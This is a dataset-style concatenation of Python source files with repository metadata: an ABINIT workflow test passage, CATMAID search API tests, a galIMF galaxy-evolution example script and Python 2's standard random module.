[abidata.pseudos("31ga.pspnc").pseudo_with_symbol('Ga'), abidata.pseudos("7n.pspnc").pseudo_with_symbol('N')] cls.scf_inp = scf_input(cls.gan_structure, cls.gan_pseudos, ecut=2, kppa=10, smearing=None, spin_mode="unpolarized") def test_phonon_workflow(self): PhononFWWorkflow.from_gs_input(gs_input=self.scf_inp, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2]) def test_dte_workflow(self): self.scf_inp['ixc'] = 7 DteFWWorkflow.from_gs_input(gs_input=self.scf_inp, spec={"test": 1}, initialization_info={"test": 1}) def test_dfpt_workflow(self): self.scf_inp['ixc'] = 7 DfptFWWorkflow.from_gs_input(gs_input=self.scf_inp, spec=None, initialization_info=None, ph_ngqpt=[2,2,2], do_ddk=True,do_dde=True, do_strain=True, do_dte=True)
davidwaroquiers/abiflows
abiflows/fireworks/workflows/tests/test_abinit_workflows.py
Python
gpl-2.0
6,666
[ "ABINIT" ]
aa8fd94d05b5a6aa969fd33b5faab66049fa0d952ad01ff62a762b042c861a70
# -*- coding: utf-8 -*- import json from catmaid.models import ClassInstance from .common import CatmaidApiTestCase class SearchApiTests(CatmaidApiTestCase): def test_search_with_no_nodes(self): self.fake_authentication() response = self.client.get( '/%d/search' % self.test_project_id, {'substring': 'tr'}) self.assertStatus(response) parsed_response = json.loads(response.content.decode('utf-8')) expected_result = [ {"id":374, "name":"downstream-A", "class_name":"neuron"}, {"id":362, "name":"downstream-B", "class_name":"neuron"}] self.assertEqual(expected_result, parsed_response) def test_search_with_no_results(self): self.fake_authentication() response = self.client.get( '/%d/search' % self.test_project_id, {'substring': 'bobobobobobobo'}) self.assertStatus(response) parsed_response = json.loads(response.content.decode('utf-8')) expected_result = [] self.assertEqual(expected_result, parsed_response) def test_search_with_several_nodes(self): self.fake_authentication() response = self.client.get( '/%d/search' % self.test_project_id, {'substring': 't'}) self.assertStatus(response) parsed_response = json.loads(response.content.decode('utf-8')) expected_result = [ {"id":465, "name":"tubby bye bye", "class_name":"driver_line"}, {"id":4, "name":"Fragments", "class_name":"group"}, {"id":364, "name":"Isolated synaptic terminals", "class_name":"group"}, {"id":2353, "name":"synapse with more targets", "class_name":"label", "connectors": [{"id": 432, "x": 2640, "y": 3450, "z": 0}]}, {"id":2345, "name":"t", "class_name":"label"}, {"id":351, "name":"TODO", "class_name":"label", "nodes":[ {"id":349, "x":3580, "y":3350, "z":252, "skid":1}, {"id":261, "x":2820, "y":1345, "z":0, "skid":235}], "connectors": [{"y": 3450.0, u"x": 2640.0, u"z": 0.0, u"id": 432}]}, {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[ {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]}, {"id":374, "name":"downstream-A", "class_name":"neuron"}, {"id":362, "name":"downstream-B", "class_name":"neuron"}, {"id":1, "name":"dull skeleton", "class_name":"skeleton"}, {"id":235, "name":"skeleton 235", "class_name":"skeleton"}, {"id":2364, "name":"skeleton 2364", "class_name":"skeleton"}, {"id":2388, "name":"skeleton 2388", "class_name":"skeleton"}, {"id":2411, "name":"skeleton 2411", "class_name":"skeleton"}, {"id":2433, "name":"skeleton 2433", "class_name":"skeleton"}, {"id":2440, "name":"skeleton 2440", "class_name":"skeleton"}, {"id":2451, "name":"skeleton 2451", "class_name":"skeleton"}, {"id":2462, "name":"skeleton 2462", "class_name":"skeleton"}, {"id":2468, "name":"skeleton 2468", "class_name":"skeleton"}, {"id":361, "name":"skeleton 361", "class_name":"skeleton"}, {"id":373, "name":"skeleton 373", "class_name":"skeleton"}] self.assertCountEqual(expected_result, parsed_response) def test_search_with_nodes_and_nonode_label(self): self.fake_authentication() response = self.client.get( '/%d/search' % self.test_project_id, {'substring': 'a'}) self.assertStatus(response) parsed_response = json.loads(response.content.decode('utf-8')) expected_result = [ {"id":485, "name":"Local", "class_name":"cell_body_location"}, {"id":487, "name":"Non-Local", "class_name":"cell_body_location"}, {"id":454, "name":"and", "class_name":"driver_line"}, {"id":4, "name":"Fragments", "class_name":"group"}, {"id":364, "name":"Isolated synaptic terminals", "class_name":"group"}, {"id":2353, "name":"synapse with more targets", "class_name":"label", "connectors": [{"id": 432, "x": 2640, "y": 3450, "z": 0}]}, {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[ {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]}, {"id":233, "name":"branched neuron", "class_name":"neuron"}, {"id":374, "name":"downstream-A", "class_name":"neuron"}, {"id":362, "name":"downstream-B", "class_name":"neuron"}] self.assertEqual(expected_result, parsed_response) def test_search_with_nodes_and_duplicate_label(self): self.fake_authentication() response = self.client.get( '/%d/search' % self.test_project_id, {'substring': 'uncertain end'}) self.assertStatus(response) parsed_response = json.loads(response.content.decode('utf-8')) # Expect only one result that has a node linked expected_result = [ {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[ {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]}, ] self.assertCountEqual(expected_result, parsed_response) # Add a duplicate record of the label, without any node links label = ClassInstance.objects.get(id=2342) label.id = None label.save() response2 = self.client.get( '/%d/search' % self.test_project_id, {'substring': 'uncertain end'}) self.assertEqual(response2.status_code, 200) parsed_response2 = json.loads(response2.content.decode(('utf-8'))) # Expect the nodes to be not linked to the duplicate record expected_result2 = [ {"id":label.id, "name":"uncertain end", "class_name":"label"}, {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[ {"id":403, "x":7840, "y":2380, "z":0, "skid":373}]} ] self.assertCountEqual(expected_result2, parsed_response2) def test_search_with_nodes(self): self.fake_authentication() response = self.client.get( '/%d/search' % self.test_project_id, {'substring': 'c'}) self.assertStatus(response) parsed_response = json.loads(response.content.decode('utf-8')) expected_result = [ {"id":485, "name":"Local", "class_name":"cell_body_location"}, {"id":487, "name":"Non-Local", "class_name":"cell_body_location"}, {"id":458, "name":"c005", "class_name":"driver_line"}, {"id":364, "name":"Isolated synaptic terminals", "class_name":"group"}, {"id":2342, "name":"uncertain end", "class_name":"label", "nodes":[{"id":403, "x":7840, "y":2380, "z":0, "skid":373}]}, {"id":233, "name":"branched neuron", "class_name":"neuron"}] self.assertEqual(expected_result, parsed_response)
catmaid/CATMAID
django/applications/catmaid/tests/apis/test_search.py
Python
gpl-3.0
7,309
[ "NEURON" ]
9e39811a7bb91c67b8a5a227aac53ac0d598a9883db7c9792b0e1fd45aae3dc8
# Python3 code # An example import galevo print("\n ================================\n" " === example_galaxy_evolution ===\n" " ================================\n") print(" This test code serves as an example, " "explaining (see comments in the code) the input parameters of the galaxy chemical evolution model.\n") Log_SFR = float(input( " Please input the logarithmic star formation rate in the unit of solar mass per yr " "and ended the input with the return key.\n" " A typical input SFR is from -4 to 4. " "Note that the code does not support extremely low SFR " "as the IMF integration error is significant for very top-light gwIMFs.\n\n" " log_{10}(SFR [M_sun/yr]) = ")) SFH_shape = input( "\n\n Please input the shape of the SFH " "and ended the input with the return key.\n" " The input can only be: 1 for a flat SFH or 2 for a skewnorm SFH, where the latter cost more calculation time.\n\n" " ") if SFH_shape == '1': SFH_shape = 'flat' elif SFH_shape == '2': SFH_shape = 'skewnorm' # Other SFH shape parameters location = 0 skewness = 10 sfr_tail = 0 SFEN = round(float(input( "\n\n Please input the characteristic star formation timescale in the unit of 10 Myr (integer only) " "and ended the input with the return key.\n" " We recommend a value smaller than 10 for 'flat' SFH and smaller than 3 for 'skewnorm' SFH for the first run, " "as longer timescale calculations take more time.\n\n" " SFT [10Myr] = "))) if SFEN < 1: print("\n\n### Warning: Wrong input 'SFEN' smaller than 1! Correct SFEN to 1. ###\n\n") SFEN = 1 print('\nGenerating new SFH...') galevo.generate_SFH(SFH_shape, Log_SFR, SFEN, sfr_tail, skewness, location) print('\nStart galaxy simulation...\n') galevo.galaxy_evol( imf='igimf', STF=0.3, # unrealistic results if more star are forming at a time step than the instantaneous gas mass SFEN=SFEN, Z_0=0.00000001886, solar_mass_component="Anders1989_mass", str_yield_table='portinari98', IMF_name='Kroupa', steller_mass_upper_bound=150, time_resolution_in_Myr=1, mass_boundary_observe_low=1.5, mass_boundary_observe_up=8, SFH_model='provided', SFE=0.013, # This parameter is not applied when SFH_model='provided'. SNIa_ON=True, high_time_resolution=None, plot_show=True, plot_save=None, outflow=None, check_igimf=True)
Azeret/galIMF
example_galaxy_evolution.py
Python
gpl-3.0
2,473
[ "Galaxy" ]
963c61ecda0473055cef80c99289b460ef90436534265434a5e24de50feebbb9
"""Random variable generators. integers -------- uniform within range sequences --------- pick random element pick random sample generate random permutation distributions on the real line: ------------------------------ uniform triangular normal (Gaussian) lognormal negative exponential gamma beta pareto Weibull distributions on the circle (angles 0 to 2pi) --------------------------------------------- circular uniform von Mises General notes on the underlying Mersenne Twister core generator: * The period is 2**19937-1. * It is one of the most extensively tested generators in existence. * Without a direct way to compute N steps forward, the semantics of jumpahead(n) are weakened to simply jump to another distant state and rely on the large period to avoid overlapping sequences. * The random() method is implemented in C, executes in a single Python step, and is, therefore, threadsafe. """ from __future__ import division from warnings import warn as _warn from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin from os import urandom as _urandom from binascii import hexlify as _hexlify import hashlib as _hashlib __all__ = ["Random","seed","random","uniform","randint","choice","sample", "randrange","shuffle","normalvariate","lognormvariate", "expovariate","vonmisesvariate","gammavariate","triangular", "gauss","betavariate","paretovariate","weibullvariate", "getstate","setstate","jumpahead", "WichmannHill", "getrandbits", "SystemRandom"] NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0) TWOPI = 2.0*_pi LOG4 = _log(4.0) SG_MAGICCONST = 1.0 + _log(4.5) BPF = 53 # Number of bits in a float RECIP_BPF = 2**-BPF # Translated by Guido van Rossum from C source provided by # Adrian Baddeley. Adapted by Raymond Hettinger for use with # the Mersenne Twister and os.urandom() core generators. import _random class Random(_random.Random): """Random number generator base class used by bound module functions. Used to instantiate instances of Random to get generators that don't share state. Especially useful for multi-threaded programs, creating a different instance of Random for each thread, and using the jumpahead() method to ensure that the generated sequences seen by each thread don't overlap. Class Random can also be subclassed if you want to use a different basic generator of your own devising: in that case, override the following methods: random(), seed(), getstate(), setstate() and jumpahead(). Optionally, implement a getrandbits() method so that randrange() can cover arbitrarily large ranges. """ VERSION = 3 # used by getstate/setstate def __init__(self, x=None): """Initialize an instance. Optional argument x controls seeding, as for Random.seed(). """ self.seed(x) self.gauss_next = None def seed(self, a=None): """Initialize internal state of the random number generator. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or is an int or long, hash(a) is used instead. Hash values for some types are nondeterministic when the PYTHONHASHSEED environment variable is enabled. """ if a is None: try: # Seed with enough bytes to span the 19937 bit # state space for the Mersenne Twister a = long(_hexlify(_urandom(2500)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds super(Random, self).seed(a) self.gauss_next = None def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, super(Random, self).getstate(), self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 3: version, internalstate, self.gauss_next = state super(Random, self).setstate(internalstate) elif version == 2: version, internalstate, self.gauss_next = state # In version 2, the state was saved as signed ints, which causes # inconsistencies between 32/64-bit systems. The state is # really unsigned 32-bit ints, so we convert negative ints from # version 2 to positive longs for version 3. try: internalstate = tuple( long(x) % (2**32) for x in internalstate ) except ValueError, e: raise TypeError, e super(Random, self).setstate(internalstate) else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) def jumpahead(self, n): """Change the internal state to one that is likely far away from the current state. This method will not be in Py3.x, so it is better to simply reseed. """ # The super.jumpahead() method uses shuffling to change state, # so it needs a large and "interesting" n to work with. Here, # we use hashing to create a large n for the shuffle. s = repr(n) + repr(self.getstate()) n = int(_hashlib.new('sha512', s).hexdigest(), 16) super(Random, self).jumpahead(n) ## ---- Methods below this point do not need to be overridden when ## ---- subclassing for the purpose of using a different core generator. ## -------------------- pickle support ------------------- def __getstate__(self): # for pickle return self.getstate() def __setstate__(self, state): # for pickle self.setstate(state) def __reduce__(self): return self.__class__, (), self.getstate() ## -------------------- integer methods ------------------- def randrange(self, start, stop=None, step=1, _int=int, _maxwidth=1L<<BPF): """Choose a random item from range(start, stop[, step]). This fixes the problem with randint() which includes the endpoint; in Python this is usually not what you want. """ # This code is a bit messy to make it fast for the # common case while still doing adequate error checking. istart = _int(start) if istart != start: raise ValueError, "non-integer arg 1 for randrange()" if stop is None: if istart > 0: if istart >= _maxwidth: return self._randbelow(istart) return _int(self.random() * istart) raise ValueError, "empty range for randrange()" # stop argument supplied. istop = _int(stop) if istop != stop: raise ValueError, "non-integer stop for randrange()" width = istop - istart if step == 1 and width > 0: # Note that # int(istart + self.random()*width) # instead would be incorrect. For example, consider istart # = -2 and istop = 0. Then the guts would be in # -2.0 to 0.0 exclusive on both ends (ignoring that random() # might return 0.0), and because int() truncates toward 0, the # final result would be -1 or 0 (instead of -2 or -1). # istart + int(self.random()*width) # would also be incorrect, for a subtler reason: the RHS # can return a long, and then randrange() would also return # a long, but we're supposed to return an int (for backward # compatibility). if width >= _maxwidth: return _int(istart + self._randbelow(width)) return _int(istart + _int(self.random()*width)) if step == 1: raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width) # Non-unit step argument supplied. istep = _int(step) if istep != step: raise ValueError, "non-integer step for randrange()" if istep > 0: n = (width + istep - 1) // istep elif istep < 0: n = (width + istep + 1) // istep else: raise ValueError, "zero step for randrange()" if n <= 0: raise ValueError, "empty range for randrange()" if n >= _maxwidth: return istart + istep*self._randbelow(n) return istart + istep*_int(self.random() * n) def randint(self, a, b): """Return random integer in range [a, b], including both end points. """ return self.randrange(a, b+1) def _randbelow(self, n, _log=_log, _int=int, _maxwidth=1L<<BPF, _Method=_MethodType, _BuiltinMethod=_BuiltinMethodType): """Return a random int in the range [0,n) Handles the case where n has more bits than returned by a single call to the underlying generator. """ try: getrandbits = self.getrandbits except AttributeError: pass else: # Only call self.getrandbits if the original random() builtin method # has not been overridden or if a new getrandbits() was supplied. # This assures that the two methods correspond. if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method: k = _int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2) r = getrandbits(k) while r >= n: r = getrandbits(k) return r if n >= _maxwidth: _warn("Underlying random() generator does not supply \n" "enough bits to choose from a population range this large") return _int(self.random() * n) ## -------------------- sequence methods ------------------- def choice(self, seq): """Choose a random element from a non-empty sequence.""" return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty def shuffle(self, x, random=None): """x, random=random.random -> shuffle list x in place; return None. Optional arg random is a 0-argument function returning a random float in [0.0, 1.0); by default, the standard random.random. """ if random is None: random = self.random _int = int for i in reversed(xrange(1, len(x))): # pick an element in x[:i+1] with which to exchange x[i] j = _int(random() * (i+1)) x[i], x[j] = x[j], x[i] def sample(self, population, k): """Chooses k unique random elements from a population sequence. Returns a new list containing elements from the population while leaving the original population unchanged. The resulting list is in selection order so that all sub-slices will also be valid random samples. This allows raffle winners (the sample) to be partitioned into grand prize and second place winners (the subslices). Members of the population need not be hashable or unique. If the population contains repeats, then each occurrence is a possible selection in the sample. To choose a sample in a range of integers, use xrange as an argument. This is especially fast and space efficient for sampling from a large population: sample(xrange(10000000), 60) """ # Sampling without replacement entails tracking either potential # selections (the pool) in a list or previous selections in a set. # When the number of selections is small compared to the # population, then tracking selections is efficient, requiring # only a small set and an occasional reselection. For # a larger number of selections, the pool tracking method is # preferred since the list takes less space than the # set and it doesn't suffer from frequent reselections. n = len(population) if not 0 <= k <= n: raise ValueError("sample larger than population") random = self.random _int = int result = [None] * k setsize = 21 # size of a small set minus size of an empty list if k > 5: setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets if n <= setsize or hasattr(population, "keys"): # An n-length list is smaller than a k-length set, or this is a # mapping type so the other algorithm wouldn't work. pool = list(population) for i in xrange(k): # invariant: non-selected at [0,n-i) j = _int(random() * (n-i)) result[i] = pool[j] pool[j] = pool[n-i-1] # move non-selected item into vacancy else: try: selected = set() selected_add = selected.add for i in xrange(k): j = _int(random() * n) while j in selected: j = _int(random() * n) selected_add(j) result[i] = population[j] except (TypeError, KeyError): # handle (at least) sets if isinstance(population, list): raise return self.sample(tuple(population), k) return result ## -------------------- real-valued distributions ------------------- ## -------------------- uniform distribution ------------------- def uniform(self, a, b): "Get a random number in the range [a, b) or [a, b] depending on rounding." return a + (b-a) * self.random() ## -------------------- triangular -------------------- def triangular(self, low=0.0, high=1.0, mode=None): """Triangular distribution. Continuous distribution bounded by given lower and upper limits, and having a given mode value in-between. http://en.wikipedia.org/wiki/Triangular_distribution """ u = self.random() try: c = 0.5 if mode is None else (mode - low) / (high - low) except ZeroDivisionError: return low if u > c: u = 1.0 - u c = 1.0 - c low, high = high, low return low + (high - low) * (u * c) ** 0.5 ## -------------------- normal distribution -------------------- def normalvariate(self, mu, sigma): """Normal distribution. mu is the mean, and sigma is the standard deviation. """ # mu = mean, sigma = standard deviation # Uses Kinderman and Monahan method. Reference: Kinderman, # A.J. and Monahan, J.F., "Computer generation of random # variables using the ratio of uniform deviates", ACM Trans # Math Software, 3, (1977), pp257-260. random = self.random while 1: u1 = random() u2 = 1.0 - random() z = NV_MAGICCONST*(u1-0.5)/u2 zz = z*z/4.0 if zz <= -_log(u2): break return mu + z*sigma ## -------------------- lognormal distribution -------------------- def lognormvariate(self, mu, sigma): """Log normal distribution. If you take the natural logarithm of this distribution, you'll get a normal distribution with mean mu and standard deviation sigma. mu can have any value, and sigma must be greater than zero. """ return _exp(self.normalvariate(mu, sigma)) ## -------------------- exponential distribution -------------------- def expovariate(self, lambd): """Exponential distribution. lambd is 1.0 divided by the desired mean. It should be nonzero. (The parameter would be called "lambda", but that is a reserved word in Python.) Returned values range from 0 to positive infinity if lambd is positive, and from negative infinity to 0 if lambd is negative. """ # lambd: rate lambd = 1/mean # ('lambda' is a Python reserved word) # we use 1-random() instead of random() to preclude the # possibility of taking the log of zero. return -_log(1.0 - self.random())/lambd ## -------------------- von Mises distribution -------------------- def vonmisesvariate(self, mu, kappa): """Circular data distribution. mu is the mean angle, expressed in radians between 0 and 2*pi, and kappa is the concentration parameter, which must be greater than or equal to zero. If kappa is equal to zero, this distribution reduces to a uniform random angle over the range 0 to 2*pi. """ # mu: mean angle (in radians between 0 and 2*pi) # kappa: concentration parameter kappa (>= 0) # if kappa = 0 generate uniform random angle # Based upon an algorithm published in: Fisher, N.I., # "Statistical Analysis of Circular Data", Cambridge # University Press, 1993. # Thanks to Magnus Kessler for a correction to the # implementation of step 4. random = self.random if kappa <= 1e-6: return TWOPI * random() s = 0.5 / kappa r = s + _sqrt(1.0 + s * s) while 1: u1 = random() z = _cos(_pi * u1) d = z / (r + z) u2 = random() if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d): break q = 1.0 / r f = (q + z) / (1.0 + q * z) u3 = random() if u3 > 0.5: theta = (mu + _acos(f)) % TWOPI else: theta = (mu - _acos(f)) % TWOPI return theta ## -------------------- gamma distribution -------------------- def gammavariate(self, alpha, beta): """Gamma distribution. Not the gamma function! Conditions on the parameters are alpha > 0 and beta > 0. The probability distribution function is: x ** (alpha - 1) * math.exp(-x / beta) pdf(x) = -------------------------------------- math.gamma(alpha) * beta ** alpha """ # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2 # Warning: a few older sources define the gamma distribution in terms # of alpha > -1.0 if alpha <= 0.0 or beta <= 0.0: raise ValueError, 'gammavariate: alpha and beta must be > 0.0' random = self.random if alpha > 1.0: # Uses R.C.H. Cheng, "The generation of Gamma # variables with non-integral shape parameters", # Applied Statistics, (1977), 26, No. 1, p71-74 ainv = _sqrt(2.0 * alpha - 1.0) bbb = alpha - LOG4 ccc = alpha + ainv while 1: u1 = random() if not 1e-7 < u1 < .9999999: continue u2 = 1.0 - random() v = _log(u1/(1.0-u1))/ainv x = alpha*_exp(v) z = u1*u1*u2 r = bbb+ccc*v-x if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z): return x * beta elif alpha == 1.0: # expovariate(1) u = random() while u <= 1e-7: u = random() return -_log(u) * beta else: # alpha is between 0 and 1 (exclusive) # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle while 1: u = random() b = (_e + alpha)/_e p = b*u if p <= 1.0: x = p ** (1.0/alpha) else: x = -_log((b-p)/alpha) u1 = random() if p > 1.0: if u1 <= x ** (alpha - 1.0): break elif u1 <= _exp(-x): break return x * beta ## -------------------- Gauss (faster alternative) -------------------- def gauss(self, mu, sigma): """Gaussian distribution. mu is the mean, and sigma is the standard deviation. This is slightly faster than the normalvariate() function. Not thread-safe without a lock around calls. """ # When x and y are two variables from [0, 1), uniformly # distributed, then # # cos(2*pi*x)*sqrt(-2*log(1-y)) # sin(2*pi*x)*sqrt(-2*log(1-y)) # # are two *independent* variables with normal distribution # (mu = 0, sigma = 1). # (Lambert Meertens) # (corrected version; bug discovered by Mike Miller, fixed by LM) # Multithreading note: When two threads call this function # simultaneously, it is possible that they will receive the # same return value. The window is very small though. To # avoid this, you have to use a lock around all calls. (I # didn't want to slow this down in the serial case by using a # lock here.) random = self.random z = self.gauss_next self.gauss_next = None if z is None: x2pi = random() * TWOPI g2rad = _sqrt(-2.0 * _log(1.0 - random())) z = _cos(x2pi) * g2rad self.gauss_next = _sin(x2pi) * g2rad return mu + z*sigma ## -------------------- beta -------------------- ## See ## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html ## for Ivan Frohne's insightful analysis of why the original implementation: ## ## def betavariate(self, alpha, beta): ## # Discrete Event Simulation in C, pp 87-88. ## ## y = self.expovariate(alpha) ## z = self.expovariate(1.0/beta) ## return z/(y+z) ## ## was dead wrong, and how it probably got that way. def betavariate(self, alpha, beta): """Beta distribution. Conditions on the parameters are alpha > 0 and beta > 0. Returned values range between 0 and 1. """ # This version due to Janne Sinkkonen, and matches all the std # texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution"). y = self.gammavariate(alpha, 1.) if y == 0: return 0.0 else: return y / (y + self.gammavariate(beta, 1.)) ## -------------------- Pareto -------------------- def paretovariate(self, alpha): """Pareto distribution. alpha is the shape parameter.""" # Jain, pg. 495 u = 1.0 - self.random() return 1.0 / pow(u, 1.0/alpha) ## -------------------- Weibull -------------------- def weibullvariate(self, alpha, beta): """Weibull distribution. alpha is the scale parameter and beta is the shape parameter. """ # Jain, pg. 499; bug fix courtesy Bill Arms u = 1.0 - self.random() return alpha * pow(-_log(u), 1.0/beta) ## -------------------- Wichmann-Hill ------------------- class WichmannHill(Random): VERSION = 1 # used by getstate/setstate def seed(self, a=None): """Initialize internal state from hashable object. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or an int or long, hash(a) is used instead. If a is an int or long, a is used directly. Distinct values between 0 and 27814431486575L inclusive are guaranteed to yield distinct internal states (this guarantee is specific to the default Wichmann-Hill generator). """ if a is None: try: a = long(_hexlify(_urandom(16)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds if not isinstance(a, (int, long)): a = hash(a) a, x = divmod(a, 30268) a, y = divmod(a, 30306) a, z = divmod(a, 30322) self._seed = int(x)+1, int(y)+1, int(z)+1 self.gauss_next = None def random(self): """Get the next random number in the range [0.0, 1.0).""" # Wichman-Hill random number generator. # # Wichmann, B. A. & Hill, I. D. (1982) # Algorithm AS 183: # An efficient and portable pseudo-random number generator # Applied Statistics 31 (1982) 188-190 # # see also: # Correction to Algorithm AS 183 # Applied Statistics 33 (1984) 123 # # McLeod, A. I. (1985) # A remark on Algorithm AS 183 # Applied Statistics 34 (1985),198-200 # This part is thread-unsafe: # BEGIN CRITICAL SECTION x, y, z = self._seed x = (171 * x) % 30269 y = (172 * y) % 30307 z = (170 * z) % 30323 self._seed = x, y, z # END CRITICAL SECTION # Note: on a platform using IEEE-754 double arithmetic, this can # never return 0.0 (asserted by Tim; proof too long for a comment). return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0 def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, self._seed, self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 1: version, self._seed, self.gauss_next = state else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) def jumpahead(self, n): """Act as if n calls to random() were made, but quickly. n is an int, greater than or equal to 0. Example use: If you have 2 threads and know that each will consume no more than a million random numbers, create two Random objects r1 and r2, then do r2.setstate(r1.getstate()) r2.jumpahead(1000000) Then r1 and r2 will use guaranteed-disjoint segments of the full period. """ if not n >= 0: raise ValueError("n must be >= 0") x, y, z = self._seed x = int(x * pow(171, n, 30269)) % 30269 y = int(y * pow(172, n, 30307)) % 30307 z = int(z * pow(170, n, 30323)) % 30323 self._seed = x, y, z def __whseed(self, x=0, y=0, z=0): """Set the Wichmann-Hill seed from (x, y, z). These must be integers in the range [0, 256). """ if not type(x) == type(y) == type(z) == int: raise TypeError('seeds must be integers') if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): raise ValueError('seeds must be in range(0, 256)') if 0 == x == y == z: # Initialize from current time import time t = long(time.time() * 256) t = int((t&0xffffff) ^ (t>>24)) t, x = divmod(t, 256) t, y = divmod(t, 256) t, z = divmod(t, 256) # Zero is a poor seed, so substitute 1 self._seed = (x or 1, y or 1, z or 1) self.gauss_next = None def whseed(self, a=None): """Seed from hashable object's hash code. None or no argument seeds from current time. It is not guaranteed that objects with distinct hash codes lead to distinct internal states. This is obsolete, provided for compatibility with the seed routine used prior to Python 2.1. Use the .seed() method instead. """ if a is None: self.__whseed() return a = hash(a) a, x = divmod(a, 256) a, y = divmod(a, 256) a, z = divmod(a, 256) x = (x + a) % 256 or 1 y = (y + a) % 256 or 1 z = (z + a) % 256 or 1 self.__whseed(x, y, z) ## --------------- Operating System Random Source ------------------ class SystemRandom(Random): """Alternate random number generator using sources provided by the operating system (such as /dev/urandom on Unix or CryptGenRandom on Windows). Not available on all systems (see os.urandom() for details). """ def random(self): """Get the next random number in the range [0.0, 1.0).""" return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF def getrandbits(self, k): """getrandbits(k) -> x. Generates a long int with k random bits.""" if k <= 0: raise ValueError('number of bits must be greater than zero') if k != int(k): raise TypeError('number of bits should be an integer') bytes = (k + 7) // 8 # bits / 8 and rounded up x = long(_hexlify(_urandom(bytes)), 16) return x >> (bytes * 8 - k) # trim excess bits def _stub(self, *args, **kwds): "Stub method. Not used for a system random number generator." return None seed = jumpahead = _stub def _notimplemented(self, *args, **kwds): "Method should not be called for a system random number generator." raise NotImplementedError('System entropy source does not have state.') getstate = setstate = _notimplemented ## -------------------- test program -------------------- def _test_generator(n, func, args): import time print n, 'times', func.__name__ total = 0.0 sqsum = 0.0 smallest = 1e10 largest = -1e10 t0 = time.time() for i in range(n): x = func(*args) total += x sqsum = sqsum + x*x smallest = min(x, smallest) largest = max(x, largest) t1 = time.time() print round(t1-t0, 3), 'sec,', avg = total/n stddev = _sqrt(sqsum/n - avg*avg) print 'avg %g, stddev %g, min %g, max %g' % \ (avg, stddev, smallest, largest) def _test(N=2000): _test_generator(N, random, ()) _test_generator(N, normalvariate, (0.0, 1.0)) _test_generator(N, lognormvariate, (0.0, 1.0)) _test_generator(N, vonmisesvariate, (0.0, 1.0)) _test_generator(N, gammavariate, (0.01, 1.0)) _test_generator(N, gammavariate, (0.1, 1.0)) _test_generator(N, gammavariate, (0.1, 2.0)) _test_generator(N, gammavariate, (0.5, 1.0)) _test_generator(N, gammavariate, (0.9, 1.0)) _test_generator(N, gammavariate, (1.0, 1.0)) _test_generator(N, gammavariate, (2.0, 1.0)) _test_generator(N, gammavariate, (20.0, 1.0)) _test_generator(N, gammavariate, (200.0, 1.0)) _test_generator(N, gauss, (0.0, 1.0)) _test_generator(N, betavariate, (3.0, 3.0)) _test_generator(N, triangular, (0.0, 1.0, 1.0/3.0)) # Create one instance, seeded from current time, and export its methods # as module-level functions. The functions share state across all uses #(both in the user's code and in the Python libraries), but that's fine # for most programs and is easier for the casual user than making them # instantiate their own Random() instance. _inst = Random() seed = _inst.seed random = _inst.random uniform = _inst.uniform triangular = _inst.triangular randint = _inst.randint choice = _inst.choice randrange = _inst.randrange sample = _inst.sample shuffle = _inst.shuffle normalvariate = _inst.normalvariate lognormvariate = _inst.lognormvariate expovariate = _inst.expovariate vonmisesvariate = _inst.vonmisesvariate gammavariate = _inst.gammavariate gauss = _inst.gauss betavariate = _inst.betavariate paretovariate = _inst.paretovariate weibullvariate = _inst.weibullvariate getstate = _inst.getstate setstate = _inst.setstate jumpahead = _inst.jumpahead getrandbits = _inst.getrandbits if __name__ == '__main__': _test()
HiSPARC/station-software
user/python/Lib/random.py
Python
gpl-3.0
32,457
[ "Gaussian" ]
789798fe4bdca163ecbabb49f79ba82aa0aa0c83c05a6b84b3cf86c35b3abc92
